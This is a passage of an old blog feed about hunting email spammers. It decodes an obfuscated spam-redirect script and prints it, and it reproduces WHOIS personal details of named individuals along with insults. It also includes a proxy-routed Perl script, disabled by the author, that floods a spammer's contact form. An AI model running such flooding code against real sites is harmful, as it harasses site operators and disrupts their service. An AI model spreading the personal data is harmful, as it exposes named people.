/&gt;\x72\x62\x65\x73\x74\x70\x72\x6F\x6D\x6F\x74\x69\x6F\x6E\x73\x73\x69\x74\x65\x2E&lt;br /&gt;\x63\x6F\x6D\x2F\x6C\x67\x25\x32\x37\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30&lt;br /&gt;\x39\x76\x61\x72\x25\x32\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x69\x6E\x64\x65\x78\x25&lt;br /&gt;\x32\x30\x25\x33\x44\x25\x32\x30\x4D\x61\x74\x68\x2E\x66\x6C\x6F\x6F\x72\x25\x32&lt;br /&gt;\x38\x4D\x61\x74\x68\x2E\x72\x61\x6E\x64\x6F\x6D\x25\x32\x38\x25\x32\x39\x25\x32&lt;br /&gt;\x30\x2A\x25\x32\x30\x74\x64\x6F\x6D\x61\x69\x6E\x73\x2E\x6C\x65\x6E\x67\x74\x68&lt;br /&gt;\x25\x32\x39\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x76\x61\x72\x25\x32&lt;br /&gt;\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x74\x6F\x25\x32\x30\x25\x33\x44\x25\x32\x30\x74&lt;br /&gt;\x64\x6F\x6D\x61\x69\x6E\x73\x25\x35\x42\x64\x6F\x6D\x61\x69\x6E\x5F\x69\x6E\x64&lt;br /&gt;\x65\x78\x25\x35\x44\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x30\x39\x6C\x6F\x63&lt;br /&gt;\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x25\x33\x44\x70\x72\x65\x66\x69\x78\x25&lt;br /&gt;\x32\x30\x2B\x25\x32\x30\x64\x6F\x6D\x61\x69\x6E\x5F\x74\x6F\x25\x32\x30\x2B\x25&lt;br /&gt;\x32\x30\x25\x32\x32\x2F\x25\x32\x32\x25\x33\x42\x25\x30\x44\x25\x30\x41\x25\x37&lt;br /&gt;\x44"));&lt;br /&gt;&lt;br /&gt;First Let's break apart the text glob into individual characters:&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;my $text = '\x76\x61\x72\x25\x32\x30\x55\x52'; ##snipped for formatting&lt;br /&gt;my @characters = split(/\\x/,$text);&lt;br /&gt;&lt;br /&gt;foreach my $char (@characters)&lt;br /&gt;{&lt;br /&gt;        print "$char ";&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;this will give us something like this&lt;br /&gt;76 61 72 25 32 30 55 52 49 25 33 42 25 30 44 25 30 41 76 ...&lt;br /&gt;&lt;br /&gt;Notice that $text is using single quotes and not double.  Using double quotes will interpret some of the results for us but not all.&lt;br /&gt;&lt;br /&gt;old value:  'var%20URI%3B%0D%0Avar%20SCRIPT_NAME%3B%0D%0Avar%20QUERY_STRING%3B%0D%0Avar&lt;br /&gt;%20_GET%3Dnew%20Array%28%29%3B%0D%0Afunction%20_cgi_parse_args%28%29%7B%0D%0A&lt;br /&gt;%09var%20i%2Ctmp%2Ctmp2%2Ctmp3%3B%0D%0A%09try%7B%0D%0A%09URI%3Dlocation.href&lt;br /&gt;%3B%0D%0A%09tmp%3Dlocation.search.substr%281%2Clocation.search.length-1%29%3B&lt;br /&gt;%0D%0A%09tmp2%3Dtmp.split%28%22%26%22%29%3B%0D%0A%09for%28i%3D0%3Bi%3C&lt;br /&gt;tmp2.length%3Bi++%29%7B%0D%0A%09%09tmp3%3Dtmp2%5Bi%5D.split%28%22%3D%22%29%3B&lt;br /&gt;%0D%0A%09%09_GET%5Btmp3%5B0%5D%5D%3Dtmp3%5B1%5D%3B%0D%0A%09%7D%0D%0A%09%7Dcatch&lt;br /&gt;%28e%29%7Balert%28e.description%29%3B%7D%0D%0A%7D%0D%0A_cgi_parse_args%28%29&lt;br /&gt;%3B%0D%0Avar%20q%20%3D%20%227%22%3B%0D%0Aif%28_GET%5Bq%5D%29%7B%0D%0A%09var&lt;br /&gt;%20prefix%20%3D%20%27http%3A//www.%27%3B%0D%0A%09document.title%3D%22Long&lt;br /&gt;%20Male%20Enhancement%22%3B%0D%0A%09var%20tdomains%20%3D%20new%20Array%28%29&lt;br /&gt;%3B%0D%0A%09tdomains%5Btdomains.length%5D%3D%27lowpricesonplatinums.com/lz&lt;br /&gt;%27%3B%0D%0A%09tdomains%5Btdomains.length%5D%3D%27ourbestpromotionssite.com/lg&lt;br /&gt;%27%3B%0D%0A%09var%20domain_index%20%3D%20Math.floor%28Math.random%28%29%20*&lt;br /&gt;%20tdomains.length%29%3B%0D%0A%09var%20domain_to%20%3D%20tdomains%5Bdomain_index&lt;br /&gt;%5D%3B%0D%0A%09location.href%3Dprefix%20+%20domain_to%20+%20%22/%22%3B%0D%0A%7D'&lt;br /&gt;&lt;br /&gt;Ok on second thought it may be better to just enclose them in double quotes and get it over with.  The unpacking reveals the same code.  It's early for me.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;use strict;&lt;br /&gt;my $text=''; ### stuff the hex encoded values from earlier in here &lt;br /&gt;my @characters = split(/\\x/,$text);&lt;br /&gt;&lt;br /&gt;foreach my $char (@characters)&lt;br /&gt;{&lt;br /&gt;     print pack("C", hex($char))&lt;br /&gt;}&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;I output the results into a file called spam.decoded.htm&lt;br /&gt;&lt;br /&gt;There is a location.href in there which will take us to the target spam sites.  The double coding is starting to annoy me so let's get everything "rendered"&lt;br /&gt;&lt;br /&gt;PERL is powerful for it's simple elegance.  If you ever feel that the solution is getting to complicated it likely IS.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;use strict;&lt;br /&gt;&lt;br /&gt;open(SPAM,"&amp;lt; spam.decoded.htm");&lt;br /&gt;my $text = &amp;lt;SPAM&amp;gt;;&lt;br /&gt;close(SPAM);&lt;br /&gt;&lt;br /&gt;$text=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;&lt;br /&gt;print $text;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;This produces the raw code that the spammer tried so hard to hide from prying eyes.&lt;br /&gt;For a javascript redirect it's fairly complex.  &lt;br /&gt;&lt;pre&gt;&lt;br /&gt;var URI;&lt;br /&gt;var SCRIPT_NAME;&lt;br /&gt;var QUERY_STRING;&lt;br /&gt;var _GET=new Array();&lt;br /&gt;function _cgi_parse_args(){&lt;br /&gt;        var i,tmp,tmp2,tmp3;&lt;br /&gt;        try{&lt;br /&gt;        URI=location.href;&lt;br /&gt;        tmp=location.search.substr(1,location.search.length-1);&lt;br /&gt;        tmp2=tmp.split("&amp;");&lt;br /&gt;        for(i=0;i&amp;lt;tmp2.length;i++){&lt;br /&gt;                tmp3=tmp2[i].split("=");&lt;br /&gt;                _GET[tmp3[0]]=tmp3[1];&lt;br /&gt;        }&lt;br /&gt;        }catch(e){alert(e.description);}&lt;br /&gt;}&lt;br /&gt;_cgi_parse_args();&lt;br /&gt;var q = "7";&lt;br /&gt;if(_GET[q]){&lt;br /&gt;        var prefix = 'http://www.';&lt;br /&gt;        document.title="Long Male Enhancement";&lt;br /&gt;        var tdomains = new Array();&lt;br /&gt;        tdomains[tdomains.length]='lowpricesonplatinums.com/lz';&lt;br /&gt;        tdomains[tdomains.length]='ourbestpromotionssite.com/lg';&lt;br /&gt;        var domain_index = Math.floor(Math.random() * tdomains.length);&lt;br /&gt;        var domain_to = tdomains[domain_index];&lt;br /&gt;        location.href=prefix + domain_to + "/";&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;this may end up as a two part post so I can spend some more time analyzing the javascript above.  I dug into the domain names presented and here is what I found&lt;br /&gt;&lt;br /&gt;&lt;table&gt;&lt;br /&gt;&lt;tr&gt;&lt;br /&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;Domain name: LOWPRICESONPLATINUMS.com&lt;br /&gt;Status:lock&lt;br /&gt;&lt;br /&gt;Registrant:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Administrative Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Technical Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Billing Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nameserver Information:&lt;br /&gt;ns1.lowpricesonplatinums.com&lt;br /&gt;ns2.lowpricesonplatinums.com&lt;br /&gt;&lt;br /&gt;Create: 2005-11-03 14:26:47&lt;br /&gt;Update: 2005-11-16&lt;br /&gt;Expired: 2006-11-03&lt;br /&gt;&lt;/td&gt;&lt;br /&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;Domain name: ourbestpromotionssite.com&lt;br /&gt;Status:lock&lt;br /&gt;&lt;br /&gt;Registrant:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Administrative Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Technical Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Billing Contact:&lt;br /&gt;Yongqi ZHANG Yongqi ZHANG syndey_heartilly@yahoo.com&lt;br /&gt;+86.2884375193 +86.2884375193&lt;br /&gt;37 Wugui Qiao&lt;br /&gt;??? ??? 610038&lt;br /&gt;CN&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Nameserver Information:&lt;br /&gt;ns1.ourbestpromotionssite.com&lt;br /&gt;ns2.ourbestpromotionssite.com&lt;br /&gt;&lt;br /&gt;Create: 2005-11-03 14:26:58&lt;br /&gt;Update: 2005-11-16&lt;br /&gt;Expired: 2006-11-03&lt;br /&gt;&lt;/td&gt;&lt;br /&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;I become very sad once I see it's a Chinese site involved.  I know there is essentially nothing that can be done at this point.  No point in even trying to track down Zhang Yong Qi&lt;br /&gt;The syndey_heartilly@yahoo.com address is likely a throw away account but send a note anyway to let Yong Qi know that Spam sucks.&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-113309770048198373?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/113309770048198373/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=113309770048198373' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/113309770048198373'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/113309770048198373'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/11/powerful-enlargement.html' title='powerful enlargement'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-112824343588426857</id><published>2005-10-02T04:41:00.000-04:00</published><updated>2005-10-11T23:06:27.996-04:00</updated><title type='text'>cheat adsense</title><content type='html'>[spammed to my blog]&lt;br /&gt;I have been to your site and I too am working very hard at cheat adsense to increase my revenue. I am also looking into many NEW ways to utilize the design to further direct people to follow my ads.&lt;br /&gt;cheat adsense &lt;br /&gt;&lt;br /&gt;Human stupidity always amazes me.  Who would be dumb enough to spam a blog whose sole purpose is to track down spammers?  DEAN HARTMANN is such a man.  Dean has taken up the challenge of being the most idiotic person on the planet and I think he's doing quite well at it.  I had three comments on my blog, which I doubt very many people even read, from Dan peddling some adsense scheme.  I traced his link (http://www.bloglinkbuilder.com/profittips) via whois to &lt;a href="http://www.whois.net/whois.cgi2?d=bloglinkbuilder.com"&gt;SYC Enterprises&lt;/a&gt;.  I haven't done much research on this "business" but it's linked to a bunch of spamming related schemes.  Most of the pages are already &lt;a href="http://64.233.167.104/search?q=cache:SVY8AMvVIfgJ:www.syc-enterprises.com/majicnotifier.htm+%22SYC+Enterprises%22&amp;hl=en"&gt; down &lt;/a&gt; but thankfully there are &lt;a href="http://www.google.com/search?hl=en&amp;lr=&amp;q=+site:www.syc-enterprises.com+%22SYC+Enterprises%22"&gt; google caches&lt;/a&gt;.    Could &lt;a href="http://www.jvseminarphotos.com/JV%20Seminar%20Attendee%20group%20photos%20web/pages/JV%20Seminar%20Group%20Photos-al.htm"&gt; this &lt;/a&gt; be our prized idiot?  It's possible, the page is hosted on a site regarding "joint marketing" efforts.  Apparently Dan believes that he is simply marketing via the Internet and not polluting it with worthless crap.  This isn't the first time for Dan either.  He is listed on &lt;a href="http://www.spamwarden.com/ReportSpam.php3?cid=1&amp;oid=680525&amp;onm=DEAN+HARTMANN"&gt; Spam Warden &lt;/a&gt; who shows he's affliated with The SFI Marketing Group. &lt;br /&gt;SFI claims to have BBB membership so if your the victim of some of their new "marketing" efforts perhaps you should drop the BBB a line to let them know what Dean is up to.  No perl code in this post.  I just wanted to track down the moron who spammed my blog.&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-112824343588426857?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/112824343588426857/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=112824343588426857' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/112824343588426857'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/112824343588426857'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/10/cheat-adsense.html' title='cheat adsense'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-112690258238251280</id><published>2005-09-16T16:28:00.000-04:00</published><updated>2005-09-16T17:03:29.623-04:00</updated><title type='text'>Replica Watches for Low Prices</title><content type='html'>Return-Path: &lt;t_m_bryant_74@freesurf.ch&gt;&lt;br /&gt;Delivered-To: spam@victim&lt;br /&gt;Received: (qmail 4047 invoked from network); 16 Sep 2005 07:39:24 -0000&lt;br /&gt;Received: from unknown (HELO ath.forthnet.gr) (218.2.113.9)&lt;br /&gt;  by loop.phpwebhosting.com with SMTP; 16 Sep 2005 07:39:24 -0000&lt;br /&gt;Received: from 149.140.93.179 by smtp.freesurf.ch;&lt;br /&gt; Fri, 16 Sep 2005 07:35:04 +0000&lt;br /&gt;Message-ID: &lt;4cfb01c5ba91$3816de36$68078028@ath.forthnet.gr&gt;&lt;br /&gt;From: "Tammy M. Bryant" &lt;t_m_bryant_74@freesurf.ch&gt;&lt;br /&gt;To: spam@victim&lt;br /&gt;Subject: Replica Watches for Low Prices&lt;br /&gt;Date: Fri, 16 Sep 2005 15:34:50 +0800&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;X-Priority: 3&lt;br /&gt;X-MSMail-Priority: Normal&lt;br /&gt;X-Mailer: Microsoft Outlook Express 6.00.2800.1158&lt;br /&gt;X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165&lt;br /&gt;Content-Type: text/plain;&lt;br /&gt; charset="iso-8859-1"&lt;br /&gt;Content-Transfer-Encoding: 8bit&lt;br /&gt;&lt;br /&gt;Do you want a high quality replica?&lt;br /&gt;&lt;br /&gt;In our online store you can buy replicas of Rolex watches and&lt;br /&gt;other brands. They look and feel exactly like the real thing.&lt;br /&gt;&lt;br /&gt;- We have 20+ different brands in our selection&lt;br /&gt;- Free shipping if you order 5 or more&lt;br /&gt;- Save up to 40% compared to the cost of other replicas&lt;br /&gt;- Standard Features:&lt;br /&gt; - Screw-in crown&lt;br /&gt; - Unidirectional turning bezel where appropriate&lt;br /&gt; - All the appropriate rolex logos, on crown and dial&lt;br /&gt; - Heavy weight&lt;br /&gt;&lt;br /&gt;Visit us: http://rlox.com/&lt;br /&gt;&lt;br /&gt;Best regards,&lt;br /&gt;Fredrick Steiner&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;No thanks: http://rlox.com/z.php&lt;br /&gt;&lt;br /&gt;I took a peek at this site through lynx and saw that the site redirected you to&lt;br /&gt;http://replica-watch-store.net&lt;br /&gt;&lt;br /&gt;WHOIS information for replica-watch-store.net:&lt;br /&gt;&lt;br /&gt;[whois.joker.com]&lt;br /&gt;domain:       replica-watch-store.net&lt;br /&gt;owner:        Luis Alberto&lt;br /&gt;email:        admin@newbiemail.net&lt;br /&gt;address:      AVENIDA 6&lt;br /&gt;address:      CALLE 21/23&lt;br /&gt;city:         SAN JOSE&lt;br /&gt;state:        --&lt;br /&gt;postal-code:  CR&lt;br /&gt;country:      CR&lt;br /&gt;phone:        +506 223-24-06&lt;br /&gt;admin-c:      admin@newbiemail.net#0&lt;br /&gt;tech-c:       admin@newbiemail.net#0&lt;br /&gt;billing-c:    admin@newbiemail.net#0&lt;br /&gt;nserver:      ns1.replica-watch-store.net 221.11.134.23&lt;br /&gt;nserver:      ns2.replica-watch-store.net 221.11.134.23&lt;br /&gt;status:       lock&lt;br /&gt;created:      2005-08-17 12:47:38 UTC&lt;br /&gt;modified:     2005-08-18 09:36:43 UTC&lt;br /&gt;expires:      2006-08-17 08:47:38 UTC&lt;br /&gt;source:       joker.com live whois service&lt;br /&gt;query-time:   0.074216&lt;br /&gt;db-updated:   2005-09-16 20:14:51&lt;br /&gt;&lt;br /&gt;Spamming isn't very nice Luis.  And it would seem that this isn't Luis' first time doing this either.  A search on Google yields some other hits on &lt;a href="http://www.toastedspam.com/stupid/disptext/mezd.com_0001"&gt;toastedspam.com&lt;/a&gt; where he was hawking pharmacy related goods.  &lt;br /&gt;&lt;br /&gt;I found a contact page on his website with a form to mail him.  That was very thoughtful of you. &lt;br /&gt;&lt;br /&gt;Here is the important code from this page&lt;br /&gt;&amp;lt;form action="contact_mail.php" method="post"&amp;gt;&lt;br /&gt; &amp;lt;tr&amp;gt;&amp;lt;td class=t2&amp;gt;Name&amp;lt;/td&amp;gt;&amp;lt;td class=t2&amp;gt;&amp;lt;input type=text name=realname value="" size=30&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt; &amp;lt;tr&amp;gt;&amp;lt;td class=t2&amp;gt;Email&amp;lt;/td&amp;gt;&amp;lt;td class=t2&amp;gt;&amp;lt;input type=text name=email value="" size=30&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt; &amp;lt;tr&amp;gt;&amp;lt;td class=t2&amp;gt;Subject&amp;lt;/td&amp;gt;&amp;lt;td class=t2&amp;gt;&amp;lt;input type=text name=subject value="" size=30&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;&lt;br /&gt; &amp;lt;tr&amp;gt;&amp;lt;td class=t2&amp;gt;Query&amp;lt;/td&amp;gt;&amp;lt;td class=t2&amp;gt;&amp;lt;textarea name=comments rows=6 cols=25&amp;gt;&amp;lt;/textarea&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt; &amp;lt;tr&amp;gt;&amp;lt;td colspan=2 align=center class=t2&amp;gt;&amp;lt;input type=submit value=Submit name=submit&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt; &amp;lt;/form&amp;gt;&lt;br /&gt;&lt;br /&gt;The "action" is set to contact_mail.php and the variables are simply realname, email, subject, and then comments.  Comments is where the message goes.  Ok so let's whip up a simple script that will let you know how we spamming victims feel.&lt;br /&gt;&lt;br /&gt;The newest addition to my code is a proxy list.  I'm not going to give up my IP to this scum so I'll go through proxies and play hide-n-seek like he does.&lt;br /&gt;&lt;br /&gt;** NOTE:  you would have to supply your own list, oh and it's neutured so again if you don't know how to code this will not work for you :) **&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;## This code is covered by the GPL so feel free to reuse it according &lt;br /&gt;## to those rules.  If you are a spammer you must castrate yourself&lt;br /&gt;## before even looking at this code.  And then you are still not &lt;br /&gt;## allowed to use it.  &lt;br /&gt;&lt;br /&gt;use strict;&lt;br /&gt;use LWP;&lt;br /&gt;&lt;br /&gt;my @proxies=('127.0.0.1','127.0.0.2');&lt;br /&gt;&lt;br /&gt;my $method='POST';&lt;br /&gt;my $target='http://replica-watch-store.net/contact_mail.php';&lt;br /&gt;my $message='INSERT YOUR MESSAGE HERE';&lt;br /&gt;&lt;br /&gt;&amp;main();&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;sub send_request&lt;br /&gt;{&lt;br /&gt;&lt;br /&gt;  my ($target,$proxy_address) = @_;&lt;br /&gt;  my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;  my $proxy='http://' . $proxy_address;&lt;br /&gt;  $ua-&gt;proxy(['http'] =&gt; $proxy);&lt;br /&gt;&lt;br /&gt;  # Create a request&lt;br /&gt;  my $req = HTTP::Request-&gt;new($method =&gt; $target);&lt;br /&gt;  my $yousuck="realname=".crap(30)."email=".crap(30)."subject=".crap(30)."comments=".$message;&lt;br /&gt;  $req-&gt;content_type('application/x-www-form-urlencoded');&lt;br /&gt;  $req-&gt;content($yousuck);&lt;br /&gt;&lt;br /&gt;  # Pass request to the user agent and get a response back&lt;br /&gt;  my $res = $ua-&gt;request($req);&lt;br /&gt;&lt;br /&gt;  # Check the outcome of the response&lt;br /&gt;  if ($res-&gt;is_success) {&lt;br /&gt;      print $proxy,"\n";&lt;br /&gt;  }&lt;br /&gt;  else {&lt;br /&gt;      print $proxy . " " . $res-&gt;status_line. "\n";&lt;br /&gt;  }&lt;br /&gt;&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub crap&lt;br /&gt;{&lt;br /&gt; my $iterations=$_[0];&lt;br /&gt; my $junk;&lt;br /&gt; my $count;&lt;br /&gt; for ($count=1; $count&lt;$iterations; $count++)&lt;br /&gt; {&lt;br /&gt;   $junk.=chr(rand(256));&lt;br /&gt; }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub deliver_message&lt;br /&gt;{&lt;br /&gt; my $url=$_[0];&lt;br /&gt; foreach my $proxy (@proxies)&lt;br /&gt; {&lt;br /&gt;  send_request($url,$proxy);&lt;br /&gt;  sleep(1);&lt;br /&gt; }&lt;br /&gt;}&lt;br /&gt;&lt;br /&gt;sub main&lt;br /&gt;{&lt;br /&gt; while (0)&lt;br /&gt; {&lt;br /&gt;  deliver_message($target); &lt;br /&gt; }&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;}&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-112690258238251280?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/112690258238251280/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=112690258238251280' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/112690258238251280'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/112690258238251280'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/09/replica-watches-for-low-prices.html' title='Replica Watches for Low Prices'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-111682440562362516</id><published>2005-05-23T00:54:00.000-04:00</published><updated>2005-05-23T01:01:14.920-04:00</updated><title type='text'>MS Office 2003 Pro $69.95 Windows</title><content type='html'>This is just to show what a poor spam looks like&lt;br /&gt;&lt;br /&gt;All the links in the email look like this:&lt;br /&gt;http://%25rnd_url/?h&lt;br /&gt;&lt;br /&gt;The %25rnd_url portion means that this came from a "kit" and the spammer either ran the generation incorrectly or the original author is an idiot.  I could see either case holding true.  I'm too tired to track this scum down tonight.  Maybe later :)&lt;br /&gt;&lt;br /&gt;For some reason there is a google adsense embedded.  I would imagine this could identify the person if needed&lt;br /&gt;&lt;textarea&gt;&lt;br /&gt;http://pagead2.googlesyndication.com/pagead/adclick?sa=l&amp;adurl=http://www.academicsuperstore.com/q/tname/f/item-index/v/Creative%2BSuite%2BPremium/index.html%3Fsourcecode%3Dlcg%26promocode%3D0D070UXX&amp;ai=BIxNDxmGRQoneCaeMsgGW-6ipD9fHggaP572NAcCNtwGQmjsQARgBIIaPgAIoA0iIOaoBEEFjY291bnRBZ2UzMHRvNjCyAQlnbWFpbC5jb23IAQHaATBodHRwOi8vZ21haWwuY29tL29qdGFnZjI1NTE2NzhvMGVvdmE2ZzJzbjNlaHNybW7oAQE&amp;num=1&lt;br /&gt;&lt;/textarea&gt;&lt;div class="blogger-post-footer"&gt;&lt;!--414141414141414141414141414141414141414141414141//--&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8256693-111682440562362516?l=spamhunting.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/111682440562362516/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=8256693&amp;postID=111682440562362516' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111682440562362516'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default/111682440562362516'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/2005/05/ms-office-2003-pro-6995-windows.html' title='MS Office 2003 Pro $69.95 Windows'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='01350002215606523940'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8256693.post-111633413637661745</id><published>2005-05-17T08:38:00.000-04:00</published><updated>2005-05-17T08:48:56.383-04:00</updated><title type='text'>QuarkXPress 6.0 $60</title><content type='html'>I've begun to setup up spam catching accounts and recently this little gem came my way.  The idea is generally they scam you for money by offering really cheap software.  If you're lucky (sort of) you will get a pirated version of the software.  More then likely you will get nothing.  This spammer employs and ID system to figure out which emails are live.  A 33 character key is used like this &lt;br&gt;&lt;br /&gt;http://5bbegging.bubxsx.info/?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx&lt;br /&gt;After you visit that url you are automatically redirected back to '/' and shown the selection of software.  WARNING: JUST LOOKING AT THE IMAGES IN THE EMAIL WILL LIKELY TAG YOU!&lt;br /&gt;So this is why I am using catcher accounts :)  I abandon them all the time so I don't care if they are tagged.  To further annoy this person I have refined my earlier false positive generator.  I used a random password generator script found &lt;a href="http://www.cgi-interactive-uk.com/random_password_generator.html"&gt;here&lt;/a&gt; coupled with psudeo  random number generation to make a nice fake ID which will hit the website.  The output isn't very pretty, just a look at the hash to make sure it is somewhat random and the HTTP code to let me know it's working.  &lt;br /&gt;&lt;br /&gt;&lt;block&gt;&lt;br /&gt;MTE0MjI1NDYzMjg3Ljc5ODp4MzVqOGU 200 OK&lt;br 